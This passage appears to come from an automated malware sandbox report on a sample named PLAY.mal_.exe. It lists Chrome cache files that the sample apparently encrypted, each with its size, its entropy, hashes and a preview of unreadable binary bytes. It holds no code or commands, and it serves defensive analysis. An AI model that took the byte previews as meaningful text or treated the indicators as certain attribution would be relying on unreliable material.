        Preview:.t+.G.SF.o1..5sbR!.?.....rh6..<r......R...[.(..9.mr.-. C$...H..E..d..a..@.2.Q0..g....A......V<....X.+q)1...z...#".X...8...LP....7.Y..:..cj.I..l..0......<|.?.V.>7.jDO.]."%8.<..%7...F.....L...P....2(....U?.No.:24T^i.....;.It.a.=m.....,E....Y3)....bB.....tT.q....7C...F..%..9..y.t...Xd...Z.8W9.3O...y.(3.eK....X.1.}.wO....\J..$6.......4..(.^ Q.7..n.Mx:g......x...0....4...7k.{.......9d..........s.CLtV........F.c)....../)....n..fh..k.J...{2...O"..SS.%8x.....x....5.<.f3.....X... ..8..._......#...(...(.O_.L5..j.$..@m.0Md.....4k....H.....i.j.%.f..D.1<J..%...&l.A9..zf..gt...xM..2.6.}7v..e,..x..)....PU.....(w$..Xhj.....;=.>.._.N.D.WU..A....[!......]y.FL.../..;.3...D........F...R...RIV.VO.s...........V*%.P.......zb5cX.x..4.9[...Z..[.#9..8.A..5....R..\.t ..*X.......Zv{V..~QI...".*.....UO3......*.8N..z.J......kP....v....Qk.......:.g)...!.......~..~E..........R._.8.......G..u...Um...t.2.V...kp...lg.s......Kx.|i.].P..C..........s).[...*.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):46136
        Entropy (8bit):7.996041651123752
        Encrypted:true
        SSDEEP:
        MD5:A46B146A6A3C81CCD66DB194D24A4490
        SHA1:CA8D5594EEAE3829B0EDF89F14AD3F4E0698C5B2
        SHA-256:6E8900825227818F0CAF323538A3A1BC9CC78355F5B9DF52E443BDE1B5DADA12
        SHA-512:2B99756F337AF2740A202C8BF6518753702A909E58B637D7DE777B9CEB1D19FE22DE6CF782DCF2970A881D09B950DE54D34E9FDA5B279A7F000905DD3FD26C20
        Malicious:false
        Preview:NW.F~9h.oW#:...l.#.7&T.p.......|...r..8..a|3.S..5..j..UI.}...7D.da.-.s..-..q..*.m.D=.Sm@.>.?....5{(.m..@OW..4!..#*L<.....B.K..]f..bt..Q`.^.F....l.....Xsi.MaF......UT......=.W.m.`.$.%4..WxA....."...8#P.......U..w....^.....7.......EP..2........q.D..".5.d....N...D.:.....+..u...QW=I....z..$..? .<...?p.&}..}2.5'.......V&*..{^x^...z..k[L.#..v{.{.Mw.U....g')$.....q..}..7..`..............B.'.....'#L.M7.T._v;...y.....Q.17.".V.,S.9@*......:..RY..3..s.....m......k..u.....J...E.z.....?.n:.=!..:BM%.'...u......L....xDD.,|..S`X...........P...~m.a#.9..m..=.@a....8.;.V.*.....$..>.)....&a......~...^.e!h.KG.e.;.....H./.z."..].9..; .].x..g......f}.....W.6.9.2....Y...a.q.+..F....[v.$.V........B..ZW..6....7@.m.DRU0o....W||./.[z..Cd....<h.+:..G.]s._o%...Z...0.P...~A.`.......0k(#s...t9....Y.x.}z..I&z)Ux\...V.Y@..Z..".E..me..G..{0..gC..k......e7.;s.C&..D......@..,..GH.8..&.W....5,@&......(..g]Y..k..{.M.u..k.d....[j..I....!.>.08.c....#.4...bIj....$..|V

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):271416
        Entropy (8bit):7.999261854102133
        Encrypted:true
        SSDEEP:
        MD5:3475AEBA08DBE1032E13192648D2BB57
        SHA1:DA9F4F89A6DD79C8440F99593067309B8D7FC073
        SHA-256:AD38BB25EC0EDEA611AE52D49EBE6E033C742FDB65E8DA907D4CDE70C4415FBA
        SHA-512:B8281D3D2726D890D6EDF84658D15F1235A3BBB84C69865B229415EE01F51387C5836A5C43790EB1D41CEA5D2A5F8B4CB1DA28A54AAA0D2DA8C57015D69FD2BA
        Malicious:false
        Preview:=Y4...._>..j.m'....lv.lP.j..k..zzzqw?..G....T#...R..q....N......../N.2....,M..g..[......,.qJ-.h.(...i.5.`d.^...h~TX......\..d..Di+.crK.@.....=...(N.....(D8....".m.?..n.........a.T..2.:JslW.Xq&Z.t.n`E.F.N.........7.r.Q.....[...;...........v....0....H."".q..^..n.iT..D.U...4PV.Q9...>.Q..(<.~d.{.0./..'.._|$"...f..........Zs.<..:..j.8X.-2S..a2-k..Ma..D..\.....}....X..P..!a..(..PP...o..m#.g]...b.:.4...6R6@a..-..R.T.....3...l.~@m....C....3. .....kF..E..W...7..9A..lb.<..C....,..&U.....U..%..`N5..R.}.....Y..2ENJ1..v.P.g...8.F...>...wW_....6[.b.}.A......, .u.#..&.E....H.......2<..C....H.m.\<NY...v...+.....s...9.?.1.rY..i...}.^K,M*m;b5.l...d.....G...wC.>frP.......Q;...J.&.M...)L>H..m....<...-.$\....#...I.......!.c.X...G..B0s.[K.<;.U..N..Pa.2.g9~.....{.....+}..-5.^..A.....G2...~...r..8..t.orb....u.;...k..?.+u.2-..u:+e>5.D.kh..w5f%rkK...........t......C..%...J.t1..s.m'..Pp2.....odk.LY.=...i(..t...`.#.../...F`.~....x...m~...o....z......U.p..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1057848
        Entropy (8bit):7.999841528228789
        Encrypted:true
        SSDEEP:
        MD5:0A85A1CACC3E321CA4AA4C5135E530DD
        SHA1:D9005F114AA39F259A3642EE34DBA07BF47146AC
        SHA-256:7CFA9171FE368FF3F8314CA6F9215085D463DB64182978FCE2F635CA1C8575EF
        SHA-512:C234E378CE9337884078F3AF8BB4541C7853FC527A350C7BA8B80CF64C991189075D8BB96FAA79C03343DD651721BC81ACBDEB6385FA18EAFC78E860DD48D7E1
        Malicious:false
        Preview:...}."f.T.....Q...b.1..`....i.|:.P=?...{"...@...(..)......Z.}xK.........~N...,0.^.t.8..&..~..C...k....~c...........l.~>x...K.T*..H..b./F....-..x"N..2^3..0W[<.FJZ4../.$..li.Q.+...&r.YW...._.......(..5.X..:?A...v.OL.sC.5*.....d.)..-.}...N...~X".`..v.6...2.).&.g..f.......,..e...9....n.t. .....J.X.A.....].!..6....f$.9...v.x.@.p..7...j.8.D......2...o.6.<L.W..^.6q.../...@.z.:...5.c.mY-...vC.k.^......W.).@I v..Z.I.....l[i..Zv..,..Po.$...6.:.Q`.j...T.{...2...<...&.<'W..@...P..u3.*3.k.........y..3K_2.f........-..IDEu.r......y.I.O.....z..h..HO.T.|..*(..?.s..jY..T...D...e...-&,..i..V.}6.$.rv.}k.f;b.... .X........#.p^X*(....J.......O....C.bi..]..Q.....e+#L...3...))..M..#...q4.m....X.....CHhv..K.XA....j.O8..IT+...yM.1l.4.."r.P..$......._..m...7.t..'d..,..i......G:^Py....T..s.U....w.r..,.R.S\....R.5i.s k.....k.].b5...qu.5c.."..[.L9.......D...)...'&....".T......E.j.][..g...m.~..ZWs..<..h...(V......Tb.6@\.|..I......n.[N.UYV.*...F..?..ap]K.H....Q%.?Z..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4203576
        Entropy (8bit):7.99995694060296
        Encrypted:true
        SSDEEP:
        MD5:00CFB936209F06F4DF48547C8F88630C
        SHA1:D78CEBD220990D7AEB41F446F47ECD40DB0D7275
        SHA-256:D84FD4913DF40E51C96BE9CD4346914949454BABF2195DD7B882E682527CCC6B
        SHA-512:827B22379D6C59BB11E94BBD98A04BD9BA4B2A3DC27C3CD789A5376C09D15B91C56B328EBF0F722793221E0539AC41350CFA7ABBF2A5C3B0B01CB22B2786C1B4
        Malicious:false
        Preview:..,.....l.....~..$Y...E..n......I.1.G.....]...:..'..8..WzH.R.?.....y.4.J..b......-..a..i... .<.....a..7C\.....?.}Q.........3L...wQ6..u...x.....3..`m~.?.6j....K.&..*....-|..p..a....v...=...Y:?....km....7.yVp.......X'..R...p...d4..E.X.u......S......;.zg.....sB.@.B.....(...........t.u..L......s_..7.S...L...m9..f.=5o.N)e...2....).J(...8....Avv#....u. ..%.%.0J....j.]p..B&2^K......B.F.h.wH....>mt.G..tA...F..*....~........P6.?...Od..R..Z.4..{.........A..)t.......m.....Pwi|...' !Y.S..9..9....y<.8.5.....m.9...]...U.?.<0..(g\}.7|8.........2..N..7(.?.+.3e...'YdC8)../K..$..E4..C..h.57. .7....F....c..k.w$P.4.85..p.&.....1.da./...&{D....N.}..L.d....r.f.c.cw....E...j2...4..N..&....U...^4.>"G.a.....:..2...x..|'...]rl.!X...FF....5.5.M....h.....1.$..&..^...0=<.&..7!.Ih..r .E..U.'.v.'B.w.c.j..2X.\.?..ORS.).d..?nQ:.,.3..."...L&...9.q....4.C...b.....n.p&.Ze.........Z.....N..nvS..z.tn..e.wX.l%.q..7..D=J..l..pN.......O'.<.F.qv....]p.Y...(z...@....,-.9L

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):37528
        Entropy (8bit):7.9951853119440495
        Encrypted:true
        SSDEEP:
        MD5:84DB6DC1A7DDCECC7F330234050B9CDC
        SHA1:C4A2C73C13D2C16753CB05EA2C0BBE8A44D424B1
        SHA-256:26496E5A214099484F7D8FE384844778C62E63BA3E3E97FED54BE0FEC5A31C83
        SHA-512:65879A0AAC463043A66C9B2A5F928F636C7293FF15F10D3DE351C276C2C40778FC7F27E762564505DA486DB8430B5AA30CE1866D797B50C551652FC35C2F0D53
        Malicious:false
        Preview:%dY....DJ4.@....X~..7Wk..1.....R|..`0..**k..2.!_6.NM.....H..jV...+,....W..8.4FR..D...m.3..NK_.]..gT...I2h....Ru>s....^!*..t..8L......ID..l.)*.R3....=e.y|p.,W.3........;.dl..}..!X..`..[.....R|.Qe...U.y.].....OKmv.\f.$.R0o.R.J.].]e..;9.&....w6.N.}%H..../...z.....r...g....]..-.....0.h.....f..\.......v..._.i!'9..n.k,..7<...2B&.i.....9.i!...g...|.......{..<m....B=ca..xc.<FE.bU.a..{.WY..6o.:M.:7.A...G..t%.z...*O.a$B.[..X..V/.R.8.F.I.....A...2Z..h...G.cl.m...z.icIz2.n...:....TG._.r....\.|....a.E....1n./... ./.k.6..FO...M.."....E/....(.YQc....D.q.q.........w.x...40.....M\'..@4.e...V....1.U..u.~M...........c.Y.D..M..~.Q.z.c?O.O^T..0.%}{P....48..~7...............^ ,.C...D......;.ggg(1dWZ.J#\../...f...../...`tEc.D...g98.`..Oj...k.5;Q.E..Ab..8.\u... ..b.d"=.....M.Y.'.K.2..J....P!..mv.w.A....(...V...T..J.-dHsx..\....C ..<....rU........FQoq....UpW.{.d...P#L.....q..vw.3.]u..z'..QW7....Og.0..2...._.]$...1.q...$.b..&`k<..+...Y.d?...v....K.|.P........X...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000002

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):36472
        Entropy (8bit):7.994480465930862
        Encrypted:true
        SSDEEP:
        MD5:EAD4770E780B299184DE7E15706B2C32
        SHA1:7E812D717A711077E323DC50DFF0B4B3F5558DB0
        SHA-256:CFCDB344C894A8FF846BAB62C4131B684114A0E6C854DDAC27AC87D80A6FFDF3
        SHA-512:8B29382EB860B9C0B440EC379FA4F4FE6006488D044720C73F63FA2E94A723B006D805DB7C7CC5CDDB9CFAAEDF10E852D3BFBFA6C86B97D07A80361EA3C655BA
        Malicious:false
        Preview:......W.....<........E..}.../..S.V6*...h.?RAs....o....6..3..]_..0.o..-X. k?.....K.4..H....U..6......p.7...T....V.4.h.....V8.C.2...^..`.ZM......y{.P..vGws8...t.^..c<$...,...i..s.-..^.'.`.#...<..........`..5G..zD..G.|./.`s..J.'...Fp"ex._..wz.W.]O.b.D......\..a.qQ>2.u..x.6...8..j8.U....*..."..d...I.-#B...'.2L7...17XSI7.L.|D........6.6.H9(...dn.n.ot.....F.H.t|..$).....~X.........>..!2....i..)W....s..RFi....!M{rw~..T.5Dj.l..G......._.....f.~.j......0.6.a0&^.p........y...Z_..c.p.Wr..da.I>..8..%....|$...m.p.T.V....CQO.nk.0.....H.@.#......K.i..Y.F_ .s..nJ>(._.....-.........>.......R.^.......a.....b.\+>.F...f....s.. ...:.,.N.\_.s.).j.U.)A.....8!...G...^6......T...@.sL`.....l....cR..H@-2....`pCP+....+2..U.$..u.z.#......A`..b....5.&....BC..n..~F.p].Z.`.b....k..Ru.-...m`..?d.#.....:....#..T.q..:..>..).M...R......a.E....u...v.xg{.B...f.a.'..h.0..%.53.;9.~..)F.ZY'9.Kd<....x....p...3....8p....6.Y..W.....M...8.S.>.:..40.d..E{..6.....^..T..m..B.I.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000003

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):42936
        Entropy (8bit):7.995756764704097
        Encrypted:true
        SSDEEP:
        MD5:F083133AE2990658BDC71A7A87F188F5
        SHA1:BD7113B99D8F841FEF778AE646030A2FF6B5F653
        SHA-256:178E044947EADB7DA546774A9F86E5F4C093B611920604924BCD232729E0A9F9
        SHA-512:F5B71CEB70C49DB221EBF24B14760FE1C13FE34890E35A740F552346FC5A053687E34654D08670237FD4925236AC61D4058A8107DB8D48FF1B09DECA5EEDB673
        Malicious:false
        Preview:1.-.4~.+..DK!...=?g..hu#....0.!".....U.C.y.......&=.l....#`kG..:%.X{.......q.n~..$.]H.7.w.G.....q.........4.....+.P.^. ..~...+.J......|.#!9oD..E......V....8...~.jS..Gl..{D..[.4G:.?Z#v6=G.u..#S92g...m=5....%..A.,.cuv..E....5..G.-[R./...<..a....h....;..E;.g.........&..M,.X.........'..._.mI..MI.......o|.P..w.u.2.t.!Y.cj.4Ck.37.K....b.:..B).Elu.a1./.~x...J........<...[=..P.v.@...v.K.k.{..=|.z{M...t....{T.F."..,...$/5......U..`..`.<n.m..c6t..-....y:~L..=X..'....~.!.U.B....P..b..\.9..x.+....(C..%......ID..w......Vl.&...q......b.....(.G...i(0..C.m.....o...oB.....k.`.....6.B.l{........V.R...4.4|...I.G(.{.dJ}.H....@p.$.b..oe@2.....R.Z90..qW.4).C+....o+.t..}...t.R7 ..t`..".>l.E/..x...0TS3iZo<..........E.....'.6........#....k5N".z.a.a.%3&...0-UH.D..~..y.......$.{.....2k..f.F..m%..u...:7..1*@.H=n....LY@v..I....v.$........)....y..F..6./....VM...._....Dd........w.fH..K8].:....E......A.1)..u...1~LG.=.;OP...../<.......$1.g.,...F.uF.kC.[.j..c...}.C=t4

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):29144
        Entropy (8bit):7.993727971334438
        Encrypted:true
        SSDEEP:
        MD5:DFD55FEB8B1A4BA5F57D697970E19D92
        SHA1:2E943EFD840F3316EA2C8876896DFEEE10D14E92
        SHA-256:386D3EC38347F9F67E6BD7D2AEBF8E934BBB617739267989D5EFAB4FB3F0D359
        SHA-512:D87CF89E9362CBE5BFD0CA834D33E541108EB6C9E98E34D4E59AE5ECB165562D5DE78C308FFA30DA6D971AC88ACCD3C27A1BF3089DCDBC69855B0B0E24D70286
        Malicious:false
        Preview:.X..9....K..3.y..x...Au.`..QFN,.'.O%.F{....e...."PD.b.]$.:.3].7.$..4..;v..G...Ft.C..Wod..;..5..w...".~......C...q.r(B.....h..k_}..R.}z>..;.3.@W.3'....Qh......z.L.u.taE...........C...R..z.<.-.\M.F .:....".{`m.W...K.q...n6...:.4..s./...S....KOF..G...C.S.s.`.nNW.f..b.c..U6.LM.N.#..Q.UI.s...p.."H~...._.)Q........s..*.Zd.6.....4:.,5..iY...3..H[A......D.....i!...<<n...._e..9..2..Nb...g......x.J...D.....[..$..j..M....4....`H..^.R.iT...tEI.G.k.......c..N9...n.(.BM.1...$5...6%.s-..Q..un..)..z....Qf...V.....q..7.*3..Y+w^.J.....m...=.....c....I,..7.QT<...../Q6\+c.....+.p.a.B.j..N..v.\X[...A.u.6..I@V.~.V.K..n...H...W....Y7....'.P.1....:......W..6.......o....-....O.......xx.V.;.............y....R.r|...b.D...(.&X....E.........h-..)i(@...e..l..Hf[...4...F2....j....u.h,.'n4.^.Q..#.p~h..b.>....y=.2.z......+..W....wH.T.^.Q..|9.Bp..k...@.....k..L.....t.~./.}q....C..'$.O..~..............Y>wh=.gC@.!.Fw$....4*.>..%...|.V..K.b..I]...L..~...FQ..B.....9.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):21080
        Entropy (8bit):7.991775618580184
        Encrypted:true
        SSDEEP:
        MD5:ECEDBB61DA79E8D623D74B5F9F353FAF
        SHA1:20ADB3B8BFB9BFE00CB015D02FF7DB96046B65C5
        SHA-256:67C8C0846A2B2C2F8323D0D2A49A24FA34594483A8B4E1889C3496CBE0523FFF
        SHA-512:C2EBF0743750563808DF053087996AA5EEAF2A2190B00FA0127DA548A2DEE3DB7ADA9980EECEA7D0230BFC7CAC557DD3193CF36509CDFB980844FBF628ABA8EE
        Malicious:false
        Preview:.N.......b....s.........+;~.....4.dH...i..K......h.".._..A_.j..1.f....K.5.ftVo.+.j.K.L?....{.4.E......l7o4.....s.`.U... A+h@~+.....T.!%b.Z....4.6.Mo[.7$<'2.L.[..%.M..S.b..dt:=t]c...?.Mu~6/.B.X..9....zR.`YJI.R.p..).(0.PJ..S*Jh.w..EK......t.x...e.N..%. ...4/Jp.h....!........Q.b....=.`.X.H.h"Qd...z..N..YqB.@.I......7O.BwVRu.x.e..S.c....Z.....-P1.p..$....~..O..BI...y...v....J".y..8Q......??.3Q..#.....,.%...._HE...v..&...I72 .F%.T..SOu..C...n]...*...o..~.......*.-8.<..I..b...lG..*.i..92~.-.....AnG..a.B.>.........v../.;.....0......v"=I.K.U..W...i.'.....=.....vy..U.z.8..+K....U..~.aH0."@....5].F..A...b.t..B.....lBm...V...:.~......;&W....*v....._2.ZF....qfX..F.....?..x..R_.........y$.0..U.@Zt.>.....G..9m..W1..$.c....{N7.+.m..].g..K<.f..Z...,2. .....v....Q...X...!Q....Z.Ig..QOO.G....H..._..=...Z....n..` .@..TP..S..DA..@..k):.<.../...m]*.t.(..7.l.waA_?Ga.........MZ...#..z~.A...|.P.....u.|.......f".....c.e........H..R.\=.w-.A.F..i.~..!...=..o".....d.x

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):43592
        Entropy (8bit):7.9953770567571345
        Encrypted:true
        SSDEEP:
        MD5:1F028070FF434B84868FBD7F52241070
        SHA1:17D3C5C7BD060C62E1B8B9A15D0FC49E638B0E76
        SHA-256:2F47573A197F1DFD59298B0F12E6E5F4014C326B1C21ED4C1E500793A2F89864
        SHA-512:8110E23F0E5BC153F27EEE11DD8C867F9EDA858DD57CFCB74EB9316F7635E1B1D1B03BF1AD8065545427AE616AA3BE2C613EC6CDCD9AC17DB7ED7EB691F16C67
        Malicious:false
        Preview:).....).b........j..TU.n.8P.v.&E.....B..:P..g9.(A.$x....}.C.i..E.S.R0.0..)}..k.....5.v...p>.....U..0A#.x..BNA.f.U....}..[.D..r.l.8....=~.o.......@".h......ec.Cd.a..j.5u.3.qU.....?..3S...{...9v. ...k..).`....e_I'......+.],.$.}..(.>.v.......L_.1...Ce..D:.+BK).q.=......>.....Y.5....Y..'...!`.X..[..*.......2v.o..7hU.....Ed.`c:.......=......K6....c..j.JTg.-..d*)e..,a.w...U...I...o.4s...E.(B...l....LD....*B)4..2..t........E.l.-6..#%....m...(.%;.<..........B..!.f[....?B..Jv..p.J.A?.m`6.D.j.T3.................}..jQ-.+.....meD5s.P.7...+.9.....u.C.W... [....AW..e..3.M.,@o@.]=.T/.Pk..;p.I..~.Wk....i.H.v.*..w..c&p=.....gx..L!..F.$...S..n..0.........H...d....[..........E_.he3."....W..|...m.)..|.rP../..p..HO..'.Y.9. ...U.*..?|......Z..........L..K.......X..o...*..s...~.[.j..i..SZ.Lj0...<.>......a..o2.e....3.u.'.;tx4........^.........N..D....^..(.....L...[....j^w...O>'<...o.Z.^....Y./.i.!*.a].M.D...#|.1x...,H..Q.oqLV.......CAqw0-D.a....y.>.?.c..v.

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):37400
        Entropy (8bit):7.995463432300585
        Encrypted:true
        SSDEEP:
        MD5:B19024881BE3E87ECA0BF4CC76C0ADEE
        SHA1:DDAA809F9DEE7295B20B1A495763EF54BD6A833E
        SHA-256:03D9DB0E7528AA70A4F1F2C8CABD3C6CB7C251D1856846FB6CBD373A5367BED3
        SHA-512:F16648E6FDFD45F505A4089AF9412F176E922BAF7304C6B07765B4D54D6A5A6BE0A97ADC67646ED011FC0BB13B275136805C9F98E242A76FC516B6ED229149BD
        Malicious:false
        Preview:i... ...7e.}~........<.|...D>^....m.....!S.L?........U...`.8...g.'_...-J.x.....K....x.4...d._..............4<.....y..,..6..d...Y6.{p...N.bE.l...`>.qi+.T..1.h.+......>.9R....."........\.....O...G.DH..........2...o.....Ffd...\...<.|a.p..E.r..l..U......H.CB..U..yj%...!.k.&7../....?.RK..>..../.&..WW.@.....B.....V.,).yDF.$x..@.:.:.....L.>fU.H.Wq..........-....w...P(...........j.......]....Ha....l..~!.pUh6vv.g.3.f...P..^Xt.c..0%.}.@..0..w..+......\..._Q._.E.0.c..lu...cQ....$AI....".3g}'^.....n.....u.f..2|.In.*W.h<.-w...wu...).i..........(~b.p.O...B......B9...<A.(.m}W.4.UK.{u.cu|c..'.^....,..S...u..h=.mq/..2.e.....N.9xO.T.>...=n...0.2 .n.U....y.......,.qs.e.~..P...i..%n.k$+.b>^...n._).....&.$.2.gE.T.)..?^..G..IffVtOY...rk.u...=w....#...R(KQ*.D..;...b...=.I.^..Z.....~.......a6K{...o.N..9.M6..)..e.Ol.Z.,....2..........j.......&..YO{D...>.KS.J,.....>....n.'.............dsv..c...#.+..U.....4 .~..:73BBg.|...+j...)..{...4............/.e.8^..:CPG....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):253144
        Entropy (8bit):7.999353184440623
        Encrypted:true
        SSDEEP:
        MD5:9D07D3A60E50BA64F07AA837B8559442
        SHA1:C814F4C7AF6F9CD2A15EF8CDE7752D2FE272CDDD
        SHA-256:BDA4D1962B35CC3E96898865EB5CDAC10830D9633DF1F75518102DB4D0634D26
        SHA-512:6DA3F8F36BCBB96A9F1E7EC9061CBC8233F5E4B92E17557D9CCF1056DB127C1DDA80ED391EE4A1CABB18D8A9FCDB76978236D341AC3EE51131A8BB3C10976767
        Malicious:false
        Preview:./.-."........].uH{CRF5s.:+9..&.o.x....5iB....K..WW...d..im......}.d.&..g.ek.v...\......?.V:.BO;..B..=.l...!s.X[,u.._...p).s4.%,_o.....M...{...7.I......8...DU.c..)..|..&rd..u.?.4!%....R..G.&......Q.S...z.3gT.1I..?..)..6....At......q..X..5...v........'..p.K..@z#J1F......h.rA.....;.G.UZ.....$....x.t2......Isp.#....Q`.h.r^r...s..I..?J.+"M....&.Q..$......T.=@..........{u..{.r....<".6.@./j.c!........N.........j...P.Q_./.o.GO. 8'..bCV..e...M..riC2D.^.>.4.0.\b$.V....|M.k..O.$O..Y.\..D.h...... 1".U ......4.....9..=aw.-....."..iU.."f">9W.....5....<.0....x...o.W..Z.....n...bX.r%...vXL....e.(.d.#O4..k@. ..Q...j.eVC.x.A.I^..gnQWu..r.......-..s2.{..o.l....-..PH........E..,uwb..^A1.RW....>).|.f..?k....k..M.....-G.8...H..Q..g.2.....*..6..:].8.,.l...V.2W..........=..W.L.....p.....b.F."v.|G.?PBBLI.qf.F.y...c.%..|_.....n.C.....uI.0F....B.....#.....Wk.5.......a..[2.(;.=...Y.O.$....p..i.+.9.|.5.;o....k.<..ozV!.dI.80..........|.4F....8P&jNMa....._...k..!.......

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):273144
        Entropy (8bit):7.99935674059747
        Encrypted:true
        SSDEEP:
        MD5:B96B403999FDF8CCE320C57831B9D792
        SHA1:6EB597C0735ECB50A80C7C45A928F3E071399036
        SHA-256:033E362F3FD34F0E8DA4F3215308906941A327485548C30B618DCDFB556D52ED
        SHA-512:C95A418715A974085A1F525506F756CD20B83FABF7640A953B85C44AB3FE2CC2255848D799D2B989C53A46FAEDDD8984E20E551B111746D53E4FAA69A1979034
        Malicious:false
        Preview:n......4`D...Rikn.#n<s@...'.I.1`.}!W*..v..w..SD}.........o.$,....V.....3....a......Y...>8N....zX.q...;...bB........<..N.....b.6m..L.X.]J..|i...{..p.....E)..[Qi..$Ln.W....-...&.J.H....7...S;1..th:.@HO...U._.D.u~Vu......U.....G.a...XT.7...$X...z...n.....W.<...TA.&...1.>5.....%..P*:.....U....9u.rDU..Cs*'..u.|j.^.s%.0.......S..MMD..Ct..3.{g.^s...U...Z.n.\.`YlWW.|.Nq|......4.038#...*....^..I..R.....U..r.?......n.....h.V|..0...3.....R.n....Z..|!..*Er.^..w._c.b..2g(..B..].h".p.........$..?....P6._.8.?X.....uY.?..G.p...".:...y(.G....,.R.a..8{...Jq[.:......V.IQ^..|..j............r....$../~.p.oS.R{...!_r.....rK..j.mK.Wz.._..%Bl........v..i......u..a.. #.hE..1c.).F'../..^9)X.\.^....O.F..z;.I.U..U8.=........pY.........U.y.'FX=:...7..?..o=.bW.f.~...>.._.lO.e.....R...."!...\.@\.................Cnp..A=..+....G.2..........u.]....{_....m...F..M....X..ml.9z F.a.......m....o&... .=.e{..h.v...lD..k.).`Ai../QX8w"+..#......b./a...-...0....U...g4Uf5RZ.D..4w.0

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):259224
        Entropy (8bit):7.999448334729802
        Encrypted:true
        SSDEEP:
        MD5:DEB04FDED8E1283B15566B9C79D556AF
        SHA1:FCCF1966F3E75C23847890132CEFB964AEE59A5E
        SHA-256:D950B33540B7169706E249C6572F097F68AF0DD8626084BCF073D3048F5B801C
        SHA-512:A02E478CB98C9F987038834126CBF39DEC988367340DA25CF89662EFC421A78A62F98E49DC46A8C7245534381ACEAE555BD7BB364BACD1E3867B2E381401FDC1
        Malicious:false
        Preview:&Wi5Qf.4..y^..R.......w....6.I..zW..:.....T.D.m..4[u~Z.4<.r..;r.a.:R....;z.b.&..J../..B.c.k......Y.6..i....g..,...?Q...M....o..e).VL.<....W..^r\A....|...6.14u......>.~j.....e.1*..o).5...P._...).|...k.[.5ls.._._...C...._.....O\....__U.T.......7..a.z.<.(.~U...E.3:X.8..bdsV{..^>..!...<..{%mU.j6...........O.......(y.0..'B.ivP..?7.g...,N/j....V..<om.0..v.K7.".$...q...<....h.P..uu ..,.x.$.@...J<...r....>...%..{{lZ.]".^tL.f.+.Yp....N.L....&g..h.n..2.X.1..$Wz....x...U.v\8D.a..{.....'.JlP.9w.....l.I......o...x..:W.,.0....QG...b...8.2...9...6......V.Xk....i.;C...2.....gK,wL.d.c`.rV....h;..?|.....|.J...P.`R/..+.C..g)C..H..{(.Kt.l.9................=..]...... .......X....6....\*.........b..L.h....u...5..J.1h.......lqK.E.."Q..~z...<..4.z...U[Xt..c.GO..bV...'.b.....M.Ap.M......@bi...{LW.bQ.......-..R`.a N...q...P.W+t(02@J ....1a&.F....Ma.(.c.b.{...Tq+C:n..6.a..{Rd.8..92..a.T.y..&....z.1.(.......R#x$+..#......_.g..^.Y!I..e.d.a.u^....C.`..~2.r.r....I......\@

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):29368
        Entropy (8bit):7.993441768289967
        Encrypted:true
        SSDEEP:
        MD5:AB93C07E8E5CB24059647A45FDF6D357
        SHA1:77484FB61D3AA45E56063933655639B47EE769E1
        SHA-256:33DCADEC7103B536CD804A6EE27DDA956E8469C6A9F67D6521ED237316CB3FAA
        SHA-512:BB969B4B673CBD3E14DF28F3E62265AF9DC50608363B069A8D8C103FE7463F841C5559429FBB2A30CD812E3ABBDCE8E6FDD9B9DC64FB619E702C1D04E0EA5463
        Malicious:false
